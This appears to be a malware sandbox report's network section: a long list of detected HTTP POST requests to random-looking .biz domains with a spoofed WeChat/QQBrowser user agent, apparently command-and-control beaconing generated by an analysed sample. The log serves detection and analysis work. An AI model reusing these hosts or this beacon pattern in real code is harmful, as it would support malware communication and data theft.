Source: global traffic HTTP traffic detected: POST /dafjrbte HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 868
Source: global traffic HTTP traffic detected: POST /qlyvjmdwxl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 868
Source: global traffic HTTP traffic detected: POST /rioeg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /hshnlfiqt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /avqaqcipoasdlbgl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /ocfuav HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /hea HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /qvtcyxjgqcewj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /qjnvredjkanikntw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /wqlih HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /kwejxnusmbg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /lsedv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /hdnypmld HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xlfhhhm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /cygphrvvuwwhpqjy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ifsaia.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /pjojuiupwn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: saytjshyf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /iac HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vcddkls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /ful HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /l HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /iou HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tbjrpv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /kyvgodg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: deoci.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /vm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /jtccktxedeenfqg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /soubumgu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qaynky.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /e HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bumxkqgxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /pgm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dwrqljrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /aawflokdkaaso HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nqwjmb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /hysug HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ytctnunms.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /sem HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /vsftv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /b HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oshhkdluh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /gx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /ieibbbqqgmrvhkh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /gjwgeffxixqbuh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jpskm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /yccyodm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lrxdmhrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /xurinfdw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wllvnzb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /orioms HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gnqgo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /dx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jhvzpcfg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /sucofgimje HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: acwjcqqv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /bpkaqfdvy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vyome.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /afqnwtrkmt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yauexmxk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /kybt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: iuzpxe.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /vahgcdxtf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sxmiywsfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /jjv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vrrazpdh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /jxjcyhijmgghr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ftxlah.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /rqdnnkaqeymsqe HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: typgfhb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /adwycgrxdylfxl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: esuzf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /lqycgpuam HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gvijgjwkh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /rlifsams HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qpnczch.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /d HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: brsua.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /oyataqebqvq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dlynankz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /umdr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oflybfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /uilsnghvu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yhqqc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /mtnqoxhnqxwi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mnjmhp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /ksosgyughs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: opowhhece.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /bduojpmqwclgr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jdhhbs.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /b HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mgmsclkyu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /qgyptpaacdeujk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: warkcdu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /mtvhnvlftyscrey HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gcedd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /saunpuqsumkr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jwkoeoqns.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /essg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xccjj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /fwgtnqaffg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: hehckyov.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /lrpwhcqxkh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rynmcq.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /cdficgkndhspr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: uaafd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /li HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: eufxebus.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /wfktgrobq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pwlqfu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /chtmfsmomhgtgs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rrqafepng.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
